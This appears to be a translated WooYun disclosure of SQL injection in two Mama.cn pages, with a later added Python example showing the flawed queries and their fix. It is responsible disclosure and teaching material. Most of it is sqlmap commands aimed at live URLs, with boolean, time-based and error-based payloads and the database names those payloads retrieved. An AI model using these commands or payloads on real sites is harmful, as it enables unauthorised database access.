Vulnerability summary

Defect ID: wooyun-2015-0111959

Title: Multiple SQL injection vulnerabilities in Mama.cn (妈妈网)

Vendor: Mama.cn (妈妈网)

Author: 路人甲

Submitted: 2015-05-04 17:17

Fixed: 2015-06-18 18:32

Published: 2015-06-18 18:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: Confirmed by the vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-05-04: Details sent to the vendor, awaiting vendor response
2015-05-04: Vendor confirmed; details disclosed to the vendor only
2015-05-14: Details disclosed to core white hats and domain experts
2015-05-24: Details disclosed to regular white hats
2015-06-03: Details disclosed to intern white hats
2015-06-18: Details disclosed to the public

Brief description:

My girlfriend told me to go to sleep today, trying to trick me again. I won't fall for it, so here I am submitting a vulnerability instead!...

Detailed description:

Here it is:

[Screenshot: QQ截图20150504152717.png]

[root@Hacker~]# Sqlmap Sqlmap -u "http://brandbase.mama.cn/friso.php?forumid=122&mod=thread" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey al
[*] starting at 15:13:38
[15:13:38] [INFO] testing connection to the target URL
[15:13:38] [INFO] testing if the target URL is stable. This can take a couple of seconds
[15:13:41] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] y
[15:14:32] [INFO] testing if GET parameter 'forumid' is dynamic
[15:14:33] [INFO] confirming that GET parameter 'forumid' is dynamic
[15:14:34] [INFO] GET parameter 'forumid' is dynamic
[15:14:36] [WARNING] heuristic (basic) test shows that GET parameter 'forumid' might not be injectable
[15:14:36] [INFO] testing for SQL injection on GET parameter 'forumid'
[15:14:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:14:40] [WARNING] reflective value(s) found and filtering out
[15:14:40] [INFO] GET parameter 'forumid' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[15:14:47] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[15:14:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:14:50] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[15:14:51] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:14:51] [INFO] testing 'MySQL inline queries'
[15:14:54] [INFO] testing 'PostgreSQL inline queries'
[15:14:54] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[15:14:55] [INFO] testing 'Oracle inline queries'
[15:14:56] [INFO] testing 'SQLite inline queries'
[15:14:57] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[15:14:57] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[15:14:58] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[15:15:00] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[15:16:01] [INFO] GET parameter 'forumid' is 'MySQL > 5.0.11 AND time-based blind' injectable
[15:16:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[15:16:01] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique fou
[15:16:22] [INFO] target URL appears to be UNION injectable with 1 columns
[15:16:24] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. --dbms=mysql)
[15:16:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'forumid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[15:17:24] [INFO] testing if GET parameter 'mod' is dynamic
[15:17:24] [INFO] confirming that GET parameter 'mod' is dynamic
[15:17:25] [INFO] GET parameter 'mod' is dynamic
[15:17:25] [WARNING] heuristic (basic) test shows that GET parameter 'mod' might not be injectable
[15:17:25] [INFO] testing for SQL injection on GET parameter 'mod'
[15:17:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:17:33] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[15:17:35] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:17:37] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[15:17:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:17:42] [INFO] testing 'MySQL inline queries'
[15:17:45] [INFO] testing 'PostgreSQL inline queries'
[15:17:46] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[15:17:46] [INFO] testing 'Oracle inline queries'
[15:17:47] [INFO] testing 'SQLite inline queries'
[15:17:48] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[15:17:50] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[15:17:52] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[15:17:55] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[15:17:57] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:18:09] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[15:18:11] [INFO] testing 'Oracle AND time-based blind'
[15:18:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[15:18:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[15:19:12] [WARNING] GET parameter 'mod' is not injectable
sqlmap identified the following injection points with a total of 258 HTTP(s) requests:
---
Place: GET
Parameter: forumid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: forumid=122 AND 6940=6940&mod=thread
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: forumid=122 AND SLEEP(5)&mod=thread
---
[15:19:12] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.27
back-end DBMS: MySQL 5.0.11
[15:19:12] [INFO] fetching database names
[15:19:12] [INFO] fetching number of databases
[15:19:12] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:19:12] [INFO] retrieved: 4
[15:19:15] [INFO] retrieved: information_schema
[15:20:24] [INFO] retrieved: brand_common
[15:21:14] [INFO] retrieved: brands
[15:21:39] [INFO] retrieved: test
available databases [4]:
[*] brand_common
[*] brands
[*] information_schema
[*] test
[15:21:56] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled
[15:21:56] [INFO] fetched data logged to text files under 'F:\????\INJECT~1\SQLMAP~1.4\Bin\output\brandbase.mama.cn'

Proof of vulnerability:

Screenshots:

[Screenshot: QQ截图20150504153226.png]

[Screenshot: QQ截图20150504153235.png]

[root@Hacker~]# Sqlmap Sqlmap -u "http://zt.mama.cn/x2/index.php?c=aosmith&a=index&page2=1&keyWord2=&keyWord1=aa#smith-index-img" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey
[*] starting at 15:20:41
[15:20:41] [INFO] testing connection to the target URL
[15:20:42] [INFO] testing if the target URL is stable. This can take a couple of seconds
[15:20:43] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameter
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] y
[15:20:48] [INFO] testing if GET parameter 'c' is dynamic
[15:20:48] [INFO] confirming that GET parameter 'c' is dynamic
[15:20:49] [WARNING] GET parameter 'c' does not appear dynamic
[15:20:49] [WARNING] heuristic (basic) test shows that GET parameter 'c' might not be injectable
[15:20:49] [INFO] testing for SQL injection on GET parameter 'c'
[15:20:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:20:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[15:20:51] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:20:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[15:20:53] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:20:53] [INFO] testing 'MySQL inline queries'
[15:20:53] [INFO] testing 'PostgreSQL inline queries'
[15:20:54] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[15:20:54] [INFO] testing 'Oracle inline queries'
[15:20:54] [INFO] testing 'SQLite inline queries'
[15:20:54] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[15:20:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[15:20:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[15:20:56] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[15:20:57] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:20:58] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[15:20:58] [INFO] testing 'Oracle AND time-based blind'
[15:20:59] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[15:21:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[15:21:09] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using o
[15:21:19] [WARNING] GET parameter 'c' is not injectable
[15:21:19] [INFO] testing if GET parameter 'a' is dynamic
[15:21:19] [INFO] confirming that GET parameter 'a' is dynamic
[15:21:20] [WARNING] GET parameter 'a' does not appear dynamic
[15:21:20] [WARNING] heuristic (basic) test shows that GET parameter 'a' might not be injectable
[15:21:20] [INFO] testing for SQL injection on GET parameter 'a'
[15:21:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:21:26] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[15:21:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:21:31] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[15:21:33] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:21:36] [INFO] testing 'MySQL inline queries'
[15:21:36] [INFO] testing 'PostgreSQL inline queries'
[15:21:37] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[15:21:37] [INFO] testing 'Oracle inline queries'
[15:21:38] [INFO] testing 'SQLite inline queries'
[15:21:38] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[15:21:41] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[15:21:44] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[15:21:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[15:21:48] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:21:51] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[15:21:53] [INFO] testing 'Oracle AND time-based blind'
[15:21:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[15:22:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[15:22:53] [WARNING] GET parameter 'a' is not injectable
[15:22:53] [INFO] testing if GET parameter 'page2' is dynamic
[15:22:53] [WARNING] GET parameter 'page2' does not appear dynamic
[15:22:54] [WARNING] heuristic (basic) test shows that GET parameter 'page2' might not be injectable
[15:22:54] [INFO] testing for SQL injection on GET parameter 'page2'
[15:22:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:23:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[15:23:06] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:23:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[15:23:12] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:23:15] [INFO] testing 'MySQL inline queries'
[15:23:15] [INFO] testing 'PostgreSQL inline queries'
[15:23:16] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[15:23:16] [INFO] testing 'Oracle inline queries'
[15:23:17] [INFO] testing 'SQLite inline queries'
[15:23:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[15:23:20] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[15:23:23] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[15:23:26] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[15:23:29] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:23:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[15:23:34] [INFO] testing 'Oracle AND time-based blind'
[15:23:37] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[15:24:11] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[15:24:45] [WARNING] GET parameter 'page2' is not injectable
[15:24:45] [INFO] testing if GET parameter 'keyWord2' is dynamic
[15:24:46] [INFO] confirming that GET parameter 'keyWord2' is dynamic
[15:24:47] [INFO] GET parameter 'keyWord2' is dynamic
[15:24:47] [WARNING] heuristic (basic) test shows that GET parameter 'keyWord2' might not be injectable
[15:24:47] [INFO] testing for SQL injection on GET parameter 'keyWord2'
[15:24:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:24:48] [WARNING] reflective value(s) found and filtering out
[15:24:53] [INFO] GET parameter 'keyWord2' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[15:24:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[15:24:57] [INFO] GET parameter 'keyWord2' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[15:24:58] [INFO] testing 'MySQL inline queries'
[15:24:58] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[15:24:58] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[15:25:58] [INFO] GET parameter 'keyWord2' is 'MySQL > 5.0.11 AND time-based blind' injectable
[15:25:58] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[15:25:58] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique f
[15:26:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'keyWord2' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 616 HTTP(s) requests:
---
Place: GET
Parameter: keyWord2
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: c=aosmith&a=index&page2=1&keyWord2=' AND 1801=1801 AND 'nwfv'='nwfv&keyWord1=aa
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: c=aosmith&a=index&page2=1&keyWord2=' AND (SELECT 1410 FROM(SELECT COUNT(*),CONCAT(0x7161737271,(SELECT (CASE WHEN (1410=1410) THEN 1
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: c=aosmith&a=index&page2=1&keyWord2=' AND SLEEP(5) AND 'Tare'='Tare&keyWord1=aa
---
[15:28:46] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0
[15:28:46] [INFO] fetching database names
[15:28:46] [INFO] the SQL query used returns 7 entries
[15:28:47] [INFO] retrieved: information_schema
[15:28:47] [INFO] retrieved: test
[15:28:48] [INFO] retrieved: try
[15:28:49] [INFO] retrieved: x
[15:28:49] [INFO] retrieved: x_new_zt
[15:28:49] [INFO] retrieved: zt
[15:28:50] [INFO] retrieved: zt2
available databases [7]:
[*] information_schema
[*] test
[*] try
[*] x
[*] x_new_zt
[*] zt
[*] zt2
[15:28:50] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandle
[15:28:50] [INFO] fetched data logged to text files under 'F:\????\INJECT~1\SQLMAP~1.4\Bin\output\zt.mama.cn'
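Both sqlmap runs above report the same root cause: a query-string value (the integer forumid on brandbase.mama.cn, the string keyWord2 on zt.mama.cn) is spliced into the SQL text, so sqlmap's paired true/false probes (6940=6940 versus its negation, 1801=1801 inside a quoted string) change the result set and give it a boolean oracle. The following example is added here and is not part of the original report or of Mama.cn's code. It rebuilds that pattern on an in-memory SQLite table that stands in for the MySQL thread table (the real schema is not on the page, so the table and rows are constructed), and shows the two fixes that remove the oracle: type validation for integer parameters and parameter binding for strings. The MySQL-only SLEEP(5) and error-based payloads from the report are not reproduced, since SQLite has no equivalent.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the forum's thread table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE thread (id INTEGER, forumid INTEGER, title TEXT)")
    conn.executemany(
        "INSERT INTO thread VALUES (?, ?, ?)",
        [(1, 122, "first"), (2, 122, "second"), (3, 7, "other")],
    )
    return conn


# --- the pattern sqlmap exploited: request values pasted into SQL text ---

def threads_vulnerable(conn, forumid):
    """Numeric context, as for ?forumid=122 in the first run above."""
    sql = f"SELECT id FROM thread WHERE forumid = {forumid} ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def search_vulnerable(conn, keyword):
    """String context, as for &keyWord2= in the second run above."""
    sql = f"SELECT id FROM thread WHERE title = '{keyword}' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


# --- the fix: validate the expected type, then bind as a parameter ---

def threads_safe(conn, forumid):
    # int() rejects anything that is not a plain integer, so the
    # 'AND 6940=6940' tail never reaches the database.
    fid = int(forumid)
    rows = conn.execute(
        "SELECT id FROM thread WHERE forumid = ? ORDER BY id", (fid,)
    )
    return [row[0] for row in rows]


def search_safe(conn, keyword):
    # The driver sends the keyword as data, not as SQL, so quotes and
    # boolean tails are compared literally against the title column.
    rows = conn.execute(
        "SELECT id FROM thread WHERE title = ? ORDER BY id", (keyword,)
    )
    return [row[0] for row in rows]


def safe_rejects(conn, forumid):
    """True if the validated lookup refuses the value outright."""
    try:
        threads_safe(conn, forumid)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    # The boolean pair sqlmap reported for forumid, plus its negated twin.
    for probe in ("122 AND 6940=6940", "122 AND 6940=6941"):
        print("vulnerable:", probe, "->", threads_vulnerable(db, probe))
        print("safe rejects:", probe, "->", safe_rejects(db, probe))
    # Same shape as the keyWord2 payload, prefixed with a known title
    # (constructed) so the true/false difference is visible.
    for probe in ("first' AND 1801=1801 AND 'nwfv'='nwfv",
                  "first' AND 1801=1802 AND 'nwfv'='nwfv"):
        print("vulnerable:", probe, "->", search_vulnerable(db, probe))
        print("safe:", probe, "->", search_safe(db, probe))
```

In the vulnerable functions the true probe returns forum 122's rows and the false probe returns nothing, which is exactly the difference sqlmap's sequence matcher measured over 258 and 616 requests. In the fixed functions the integer lookup refuses the probe before any SQL runs and the string lookup returns an empty result for every probe, so an attacker's tautology and its negation are indistinguishable. The same change applies to the PHP/MySQL stack the report identifies (PDO or mysqli prepared statements with bound parameters), which is why the empty fix section above should be read as "bind every request value".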

Fix suggestion:

Copyright notice: when reposting, please credit the source: 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmed at: 2015-05-04 18:30

Vendor reply:

Thanks

Latest status:

None yet